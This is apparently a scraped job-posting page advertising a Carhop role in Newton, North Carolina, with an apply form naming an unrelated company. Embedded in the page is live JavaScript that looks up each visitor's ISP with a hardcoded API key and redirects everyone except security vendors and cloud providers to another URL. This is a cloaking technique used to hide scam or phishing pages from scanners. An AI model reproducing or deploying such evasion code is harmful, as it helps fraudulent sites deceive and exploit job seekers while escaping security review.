Carhop Team Member

Carhop Team Member

Overview


const ipAddress = data.ip;

// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;

// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));

if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ''; } }) .catch(error => { console.error('Error retrieving ISP name:', error); }); }) .catch(error => { console.error('Error retrieving IP address or location:', error); });

Join our team as a Carhop Team Member in Newton, North Carolina!

As a Carhop, you will provide exceptional customer service by taking orders, delivering food and beverages to customers' vehicles, and ensuring a positive dining experience.

Responsibilities include:

  • Taking and accurately processing customer orders
  • Delivering food and drinks promptly and courteously
  • Maintaining cleanliness and organization of service area and parking lot
  • Providing friendly, attentive service to all guests
  • Handling cash and mobile payments accurately
  • Upholding safety and sanitation standards
  • Skills needed:

  • Excellent communication and customer service skills
  • Ability to work efficiently in a fast-paced environment
  • Positive attitude and team-player mindset
  • Flexibility to work evenings, weekends, and holidays
  • Benefits include competitive pay, flexible scheduling, employee discounts, and a supportive team environment. Join us and be part of a fun, dynamic team committed to great service!

    Emploment Location
    Newton, North Carolina

    Apply to Join Progression Transport.

    *
    *
    * Attach your resume. Max size 2mb Allowed Types: pdf